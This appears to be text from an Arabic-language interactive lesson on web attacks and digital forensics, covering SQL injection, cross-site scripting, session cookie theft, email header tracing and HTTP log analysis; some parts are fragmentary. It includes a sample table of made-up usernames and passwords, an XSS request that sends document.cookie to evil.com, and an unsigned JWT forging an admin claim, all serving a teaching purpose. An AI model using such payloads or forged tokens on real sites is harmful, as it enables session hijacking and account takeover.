المهاجم يُدخل كود SQL في حقول الإدخال لتجاوز المصادقة أو سرقة البيانات. من أخطر هجمات الويب وأكثرها شيوعاً.
| ID | اسم المستخدم | كلمة المرور | الصلاحية |
|---|---|---|---|
| 1 | admin | Admin@2024! | 🔴 مدير |
| 2 | khalid | kh@lid123 | 🟡 موظف |
| 3 | sara | sara_pass | 🟡 موظفة |
| 4 | forensics | f0r3ns1cs! | 🟢 محقق |
الكود الأصلي في الخادم:
المهاجم يحقن كود JavaScript خبيث في صفحة الويب يُنفَّذ في متصفح الضحية. يُستخدم لسرقة Cookies أو إعادة التوجيه أو تشويه المواقع.
موقع البحث يعرض ما كتبه المستخدم مباشرة دون تنظيف:
GET /search?q=<script>fetch('evil.com?c='+document.cookie)</script> — ماذا حدث؟الخادم يُعطي المستخدم بعد تسجيل الدخول "رمز جلسة" (Session Token / Cookie). إذا سرقه المهاجم، يستطيع انتحال هوية الضحية دون معرفة كلمة المرور.
| اسم الـ Cookie | القيمة | الخادم | Secure | HttpOnly | الحكم |
|---|---|---|---|---|---|
| PHPSESSID | a1b2c3d4e5f6789abc | bank.sa | ✅ | ✅ | آمن |
| user_session | eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ. | target-app.com | ❌ | ❌ | ⚠️ خطر |
| remember_me | 3f8a...hash... | forum.net | ✅ | ❌ | تحقق |
alg: none) — أي شخص يستطيع تعديله لادعاء أنه admin!
document.cookie يُرسَل لخادم المهاجم عبر كود XSS (كما رأينا في التبويب السابق)رأس الإيميل يحتوي على مسار الرسالة الكامل من المرسل إلى المستقبل. المحقق يحلله لتتبع IP الحقيقي للمرسل حتى لو استخدم بريداً مجهولاً.
الرسالة تمر بعدة خوادم — كل خطوة تُسجَّل في الـ Received headers (تُقرأ من الأسفل للأعلى)
كل طلب HTTP يُسجَّل في ملف log. المحقق يحلل هذه السجلات لإعادة بناء ما حدث: من هاجم؟ متى؟ ماذا فعل؟